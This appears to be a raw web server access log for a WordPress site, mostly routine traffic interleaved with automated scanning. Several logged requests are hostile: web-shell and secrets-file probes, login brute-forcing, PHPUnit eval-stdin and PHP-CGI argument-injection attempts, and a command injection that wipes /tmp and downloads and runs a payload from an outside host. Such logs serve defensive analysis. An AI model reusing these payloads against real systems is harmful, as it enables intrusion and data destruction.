130.33.78.129 - - [30/Oct/2025:14:03:58 +0800] "GET /des.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /aaa.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /gifclass.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /vee.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /efile.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /afile.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /errorfile.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /gool.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:03:59 +0800] "GET /haikh.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /135.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /enclas.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /image.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /wp-admin/wp-conflg.php?p= HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /mail.php? HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:00 +0800] "GET /sx.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /max.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /size.php?p= HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /mpxct.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /0xx.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /s.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /hq.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /blox.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:01 +0800] "GET /ant.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:02 +0800] "GET /fso.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:02 +0800] "GET /htaccess.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [30/Oct/2025:14:04:02 +0800] "POST /wp-cron.php?doing_wp_cron=1761804242.8273150920867919921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
130.33.78.129 - - [30/Oct/2025:14:04:02 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:12 +0800] "GET /wp-admin/about.php HTTP/1.1" 302 5 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:12 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fabout.php&reauth=1 HTTP/1.1" 200 8681 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:12 +0800] "GET /readme.php HTTP/1.1" 404 27 "-" "-"
130.33.78.129 - - [30/Oct/2025:14:04:12 +0800] "GET /v.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [30/Oct/2025:14:07:14 +0800] "POST /wp-cron.php?doing_wp_cron=1761804434.1184470653533935546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
194.230.72.228 - - [30/Oct/2025:14:07:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
43.166.251.233 - - [30/Oct/2025:14:09:43 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-300x169.webp HTTP/1.1" 200 9480 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:14:13:52 +0800] "POST /wp-cron.php?doing_wp_cron=1761804832.1526770591735839843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
161.35.230.245 - - [30/Oct/2025:14:13:52 +0800] "GET / HTTP/1.0" 301 0 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
43.157.149.188 - - [30/Oct/2025:14:17:24 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472-150x150.webp HTTP/1.1" 200 4760 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:14:25:06 +0800] "POST /wp-cron.php?doing_wp_cron=1761805506.5789439678192138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
171.42.29.247 - - [30/Oct/2025:14:25:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 8.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.1925.88 Safari/537.36"
171.42.29.247 - - [30/Oct/2025:14:25:06 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 8.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.1925.88 Safari/537.36"
171.42.29.247 - - [30/Oct/2025:14:25:06 +0800] "GET /contacts/ HTTP/1.1" 200 21516 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.1627.88 Safari/537.36"
111.22.251.242 - - [30/Oct/2025:14:25:25 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [30/Oct/2025:14:26:54 +0800] "POST /wp-cron.php?doing_wp_cron=1761805614.3536219596862792968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
171.42.29.247 - - [30/Oct/2025:14:26:54 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.1974.88 Safari/537.36"
171.42.29.247 - - [30/Oct/2025:14:26:54 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 10.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.1974.88 Safari/537.36"
171.42.29.247 - - [30/Oct/2025:14:26:54 +0800] "GET /contacts/ HTTP/1.1" 200 21516 "-" "Mozilla/5.0 (Windows NT 7.4; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2194.88 Safari/537.36"
43.155.188.157 - - [30/Oct/2025:14:29:47 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-150x150.webp HTTP/1.1" 200 5292 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
125.86.109.119 - - [30/Oct/2025:14:34:51 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.7"
36.133.115.36 - - [30/Oct/2025:14:34:52 +0800] "POST /wp-cron.php?doing_wp_cron=1761806091.9734621047973632812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
114.246.218.78 - - [30/Oct/2025:14:34:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69"
114.246.218.78 - - [30/Oct/2025:14:34:52 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69"
182.61.139.114 - - [30/Oct/2025:14:39:13 +0800] "GET / HTTP/1.1" 200 33931 "-" "Python/3.6 aiohttp/3.8.6"
36.133.115.36 - - [30/Oct/2025:14:40:48 +0800] "POST /wp-cron.php?doing_wp_cron=1761806448.8348240852355957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.113.235 - - [30/Oct/2025:14:40:49 +0800] "GET /portfolio/%e5%86%b7%e8%bd%a7%e5%8d%b7/ HTTP/1.1" 200 18715 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:14:52:27 +0800] "POST /wp-cron.php?doing_wp_cron=1761807147.5823740959167480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.95.216.149 - - [30/Oct/2025:14:52:27 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
85.95.216.149 - - [30/Oct/2025:14:52:29 +0800] "POST /wp-login.php HTTP/1.1" 200 2917 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [30/Oct/2025:14:55:05 +0800] "POST /wp-cron.php?doing_wp_cron=1761807305.9282031059265136718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.132.153.116 - - [30/Oct/2025:14:55:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.132.153.116 - - [30/Oct/2025:14:55:14 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [30/Oct/2025:15:02:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761807777.5996971130371093750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.27.244 - - [30/Oct/2025:15:02:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:15:19:12 +0800] "POST /wp-cron.php?doing_wp_cron=1761808752.0598890781402587890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.60.195 - - [30/Oct/2025:15:19:12 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:15:27:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761809277.1016120910644531250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.153.140.179 - - [30/Oct/2025:15:27:57 +0800] "GET /.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2"
36.133.115.36 - - [30/Oct/2025:15:31:52 +0800] "POST /wp-cron.php?doing_wp_cron=1761809512.0263400077819824218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.253.26 - - [30/Oct/2025:15:31:52 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:15:38:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761809888.0344920158386230468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.212.223.77 - - [30/Oct/2025:15:38:08 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
173.212.223.77 - - [30/Oct/2025:15:38:10 +0800] "POST /wp-login.php HTTP/1.1" 200 2917 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [30/Oct/2025:15:40:48 +0800] "POST /wp-cron.php?doing_wp_cron=1761810048.8628070354461669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.203.164 - - [30/Oct/2025:15:40:49 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
61.132.217.130 - - [30/Oct/2025:15:41:19 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
36.133.115.36 - - [30/Oct/2025:15:43:54 +0800] "POST /wp-cron.php?doing_wp_cron=1761810233.9875140190124511718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
109.162.173.68 - - [30/Oct/2025:15:43:55 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
36.133.115.36 - - [30/Oct/2025:15:44:51 +0800] "POST /wp-cron.php?doing_wp_cron=1761810291.0214819908142089843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
177.129.17.55 - - [30/Oct/2025:15:44:52 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [30/Oct/2025:15:48:36 +0800] "POST /wp-cron.php?doing_wp_cron=1761810516.3733129501342773437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.134.141.244 - - [30/Oct/2025:15:48:36 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:15:49:31 +0800] "POST /wp-cron.php?doing_wp_cron=1761810571.0295279026031494140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
152.53.88.59 - - [30/Oct/2025:15:49:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
52.167.144.146 - - [30/Oct/2025:16:00:32 +0800] "GET /2164/ HTTP/1.1" 200 23817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [30/Oct/2025:16:14:21 +0800] "POST /wp-cron.php?doing_wp_cron=1761812061.7836589813232421875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.140.225 - - [30/Oct/2025:16:14:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.140.225 - - [30/Oct/2025:16:14:23 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:16:23:19 +0800] "POST /wp-cron.php?doing_wp_cron=1761812599.6911981105804443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.205.73.55 - - [30/Oct/2025:16:23:19 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
170.205.73.55 - - [30/Oct/2025:16:23:21 +0800] "POST /wp-login.php HTTP/1.1" 200 2917 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [30/Oct/2025:16:25:36 +0800] "POST /wp-cron.php?doing_wp_cron=1761812736.3289430141448974609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.182.74 - - [30/Oct/2025:16:25:55 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
36.133.115.36 - - [30/Oct/2025:16:27:47 +0800] "POST /wp-cron.php?doing_wp_cron=1761812867.7259199619293212890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.49.148.238 - - [30/Oct/2025:16:27:47 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.49.148.238 - - [30/Oct/2025:16:27:51 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
43.133.139.6 - - [30/Oct/2025:16:28:38 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:16:36:03 +0800] "POST /wp-cron.php?doing_wp_cron=1761813363.1159880161285400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
110.80.135.11 - - [30/Oct/2025:16:36:03 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
110.80.135.11 - - [30/Oct/2025:16:36:03 +0800] "GET / HTTP/1.1" 200 153674 "-" "-"
36.133.115.36 - - [30/Oct/2025:16:39:09 +0800] "POST /wp-cron.php?doing_wp_cron=1761813549.5786139965057373046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.182.138 - - [30/Oct/2025:16:39:09 +0800] "GET /login.rsp HTTP/1.1" 301 5 "-" "Hello World"
213.209.157.254 - - [30/Oct/2025:16:39:16 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1"
36.133.115.36 - - [30/Oct/2025:16:40:43 +0800] "POST /wp-cron.php?doing_wp_cron=1761813643.6519401073455810546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
217.154.180.19 - - [30/Oct/2025:16:40:43 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
36.133.115.36 - - [30/Oct/2025:16:41:45 +0800] "POST /wp-cron.php?doing_wp_cron=1761813705.4589269161224365234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.251.233 - - [30/Oct/2025:16:41:45 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:17:10:05 +0800] "POST /wp-cron.php?doing_wp_cron=1761815405.1858069896697998046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.2.4.96 - - [30/Oct/2025:17:10:05 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
185.2.4.96 - - [30/Oct/2025:17:10:07 +0800] "POST /wp-login.php HTTP/1.1" 200 2917 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [30/Oct/2025:17:35:31 +0800] "POST /wp-cron.php?doing_wp_cron=1761816931.0075740814208984375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
151.80.24.32 - - [30/Oct/2025:17:35:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
36.133.115.36 - - [30/Oct/2025:17:57:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761818228.6576530933380126953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
216.48.177.180 - - [30/Oct/2025:17:57:08 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
216.48.177.180 - - [30/Oct/2025:17:57:10 +0800] "POST /wp-login.php HTTP/1.1" 200 2917 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [30/Oct/2025:18:16:00 +0800] "POST /wp-cron.php?doing_wp_cron=1761819360.7951319217681884765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.36.101.33 - - [30/Oct/2025:18:16:00 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:02 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:03 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:03 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:04 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:05 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:06 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:06 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:06 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:06 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:06 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:07 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:16:07 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
121.36.101.33 - - [30/Oct/2025:18:17:08 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [30/Oct/2025:18:29:45 +0800] "POST /wp-cron.php?doing_wp_cron=1761820185.7144119739532470703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.137.51.150 - - [30/Oct/2025:18:29:46 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [30/Oct/2025:18:35:18 +0800] "POST /wp-cron.php?doing_wp_cron=1761820518.2592270374298095703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.198.154.245 - - [30/Oct/2025:18:35:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
36.133.115.36 - - [30/Oct/2025:18:48:46 +0800] "POST /wp-cron.php?doing_wp_cron=1761821326.5085060596466064453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.182.138 - - [30/Oct/2025:18:48:46 +0800] "GET /login.rsp HTTP/1.1" 301 5 "-" "Hello World"
67.205.34.113 - - [30/Oct/2025:18:49:19 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
67.205.34.113 - - [30/Oct/2025:18:49:20 +0800] "POST /wp-login.php HTTP/1.1" 200 2917 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [30/Oct/2025:18:58:32 +0800] "POST /wp-cron.php?doing_wp_cron=1761821912.9474630355834960937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.111.67.189 - - [30/Oct/2025:18:58:33 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:19:02:37 +0800] "POST /wp-cron.php?doing_wp_cron=1761822156.9679429531097412109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.187.106 - - [30/Oct/2025:19:02:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.187.106 - - [30/Oct/2025:19:02:39 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [30/Oct/2025:19:12:35 +0800] "POST /wp-cron.php?doing_wp_cron=1761822755.2932910919189453125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.252.89.75 - - [30/Oct/2025:19:12:36 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [30/Oct/2025:19:17:41 +0800] "POST /wp-cron.php?doing_wp_cron=1761823061.2223699092864990234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
